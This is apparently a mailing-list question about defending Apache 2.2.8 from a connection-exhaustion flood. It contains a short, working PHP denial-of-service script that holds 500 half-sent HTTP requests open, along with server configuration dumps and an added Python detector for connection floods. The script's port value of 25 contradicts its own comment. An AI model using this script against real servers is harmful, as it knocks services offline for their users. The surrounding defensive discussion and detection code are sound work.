Hello,

One of my servers was affected by a TCP flood attack targeted at the HTTP
service (Apache 2.2.8). Short attack description: an attacker opens a large
number of TCP connections to the Apache service and sends a few bytes (for
example, a single "GET / HTTP/1.1" line) on every opened connection. The HTTP
service opens a new process for every such connection and waits for further
input. After a short time, httpd reaches its connection limit and stops
responding. Some of my servers are protected by a state-tracking firewall that
protects them against this kind of attack.

My question: is it possible to configure Apache httpd in order to protect it
against these attacks?

Thank you in advance.

#####################################################################################

Here is the simple PHP script that demonstrates the
attack:

<?php
/**
 * Proof of concept script: TCP connection flooding
 * THIS SCRIPT WAS WRITTEN FOR INTERNAL TEST PURPOSES ONLY!!!
 */

// "Victim" server IP address or domain name
$target_host = '192.168.2.222';
// TCP port (normally, 80)
$target_port = 25;

$conn = array();
for ($i = 0; $i < 500; $i++) {
    // Open a connection; a failed connect is silenced and simply skipped
    if ($conn[$i] = @fsockopen($target_host, $target_port)) {
        echo "Connection #$i opened\n";
        flush();
        // Send only the request line, never the blank line that ends the
        // headers, so the server process that accepted this socket keeps
        // waiting for more input (lets send the first line and grab an
        // apache process)
        fwrite($conn[$i], "GET / HTTP/1.1\r\n");
    }
}
// Keep every socket open: the server must be blocked until the script exits
sleep(30);
?>

#####################################################################################

Here is some local Apache data:

# /usr/sbin/apache2ctl -V
Server version: Apache/2.2.8 (Ubuntu)
Server built:   Mar 10 2009 18:09:51
Server's Module Magic Number: 20051115:11
Server loaded:  APR 1.2.11, APR-Util 1.2.12
Compiled using: APR 1.2.11, APR-Util 1.2.12
Architecture:   64-bit
Server MPM:     Prefork
  threaded:     no
    forked:     yes (variable process count)
Server compiled with....
 -D APACHE_MPM_DIR="server/mpm/prefork"
 -D APR_HAS_SENDFILE
 -D APR_HAS_MMAP
 -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
 -D APR_USE_SYSVSEM_SERIALIZE
 -D APR_USE_PTHREAD_SERIALIZE
 -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
 -D APR_HAS_OTHER_CHILD
 -D AP_HAVE_RELIABLE_PIPED_LOGS
 -D DYNAMIC_MODULE_LIMIT=128
 -D HTTPD_ROOT=""
 -D SUEXEC_BIN="/usr/lib/apache2/suexec"
 -D DEFAULT_PIDLOG="/var/run/apache2.pid"
 -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
 -D DEFAULT_LOCKFILE="/var/run/apache2/accept.lock"
 -D DEFAULT_ERRORLOG="logs/error_log"
 -D AP_TYPES_CONFIG_FILE="/etc/apache2/mime.types"
 -D SERVER_CONFIG_FILE="/etc/apache2/apache2.conf"

#####################################################################################

# cat apache2.conf |egrep "^[a-zA-Z0-9 \t<].*"
ServerRoot "/etc/apache2"
LockFile /var/lock/apache2/accept.lock
PidFile ${APACHE_PID_FILE}
Timeout 15
KeepAlive Off
MaxKeepAliveRequests 100
KeepAliveTimeout 10
<IfModule mpm_prefork_module>
    StartServers          5
    MinSpareServers       5
    MaxSpareServers      10
    MaxClients          100
    MaxRequestsPerChild   0
</IfModule>
<IfModule mpm_worker_module>
    StartServers          2
    MaxClients          100
    MinSpareThreads      25
    MaxSpareThreads      50
    ThreadsPerChild      25
    MaxRequestsPerChild   0
</IfModule>
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
AccessFileName .htaccess
<Files ~ "^\.ht">
    Order allow,deny
    Deny from all
</Files>
DefaultType text/plain
HostnameLookups Off
ErrorLog /var/log/apache2/error.log
LogLevel warn
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf
Include /etc/apache2/httpd.conf
Include /etc/apache2/ports.conf
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
ServerTokens Prod
ServerSignature Off
Include /etc/apache2/conf.d/
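One way to see this attack from the server side, added here as an example and not part of the original post or of Apache: the tell-tale sign is a small number of peers each holding tens of established connections to port 80 while the prefork worker pool (MaxClients 100 in the configuration above) fills up. The script below parses `ss -tn`-style output (the sample is constructed, not captured from the poster's server), counts established connections to port 80 per peer address, flags peers above an assumed per-IP threshold of 20, and reports what fraction of the 100 workers those connections consume. The addresses, the threshold and the `ss` column layout are assumptions.

```python
"""Count concurrent connections to the HTTP port per peer and flag floods.

Added example (not from the original post). Parses `ss -tn`-style output;
the sample below is constructed to look like the attack in the question.
"""
from collections import Counter

MAX_CLIENTS = 100   # MaxClients from the posted prefork configuration
HTTP_PORT = 80
PER_IP_LIMIT = 20   # assumed threshold; a browser rarely holds more than ~8


def _sample_ss_output():
    """Constructed `ss -tn` output: one flooding peer holding 60 established
    connections to :80, two ordinary web clients, one TIME-WAIT socket and
    one SSH session that must not be counted."""
    lines = ["State      Recv-Q Send-Q Local Address:Port   Peer Address:Port"]
    for i in range(60):
        lines.append(f"ESTAB      0      0      192.168.2.222:80    192.168.2.10:{41000 + i}")
    lines.append("ESTAB      0      0      192.168.2.222:80    10.0.0.5:52311")
    lines.append("ESTAB      0      0      192.168.2.222:80    10.0.0.7:52390")
    lines.append("TIME-WAIT  0      0      192.168.2.222:80    10.0.0.7:52380")
    lines.append("ESTAB      0      0      192.168.2.222:22    10.0.0.9:60001")
    return "\n".join(lines) + "\n"


SAMPLE_SS_OUTPUT = _sample_ss_output()


def parse_connections(ss_text):
    """Yield (state, local_port, peer_ip) from `ss -tn` output.

    Address columns are split on the last ':' so bracketed IPv6 literals
    such as [::ffff:192.168.2.10]:41000 keep their address intact."""
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] == "State":   # blank or header line
            continue
        state, local, peer = fields[0], fields[3], fields[4]
        try:
            local_port = int(local.rsplit(":", 1)[1])
        except (IndexError, ValueError):
            continue
        peer_ip = peer.rsplit(":", 1)[0]
        yield state, local_port, peer_ip


def established_per_peer(ss_text, port=HTTP_PORT):
    """Count ESTAB connections to `port`, keyed by peer IP address."""
    counts = Counter()
    for state, local_port, peer_ip in parse_connections(ss_text):
        if state == "ESTAB" and local_port == port:
            counts[peer_ip] += 1
    return counts


def flood_sources(counts, per_ip_limit=PER_IP_LIMIT):
    """Peers holding more than `per_ip_limit` concurrent connections."""
    return {ip: n for ip, n in counts.items() if n > per_ip_limit}


def pool_pressure(counts, max_clients=MAX_CLIENTS):
    """Fraction of the prefork worker pool tied up by the counted connections."""
    return sum(counts.values()) / max_clients


if __name__ == "__main__":
    counts = established_per_peer(SAMPLE_SS_OUTPUT)
    print("established connections to :80 per peer:", dict(counts))
    print("suspected flood sources:", flood_sources(counts))
    print(f"worker pool in use: {pool_pressure(counts):.0%}")
```

On a live host, feed the real output in with `established_per_peer(sys.stdin.read())` from `ss -tn | python3 script.py`; with MaxClients 100 and a single peer allowed to hold more than 100 sockets, one source is enough to park every worker, which is why a per-source connection cap at the firewall complements anything done in httpd.conf.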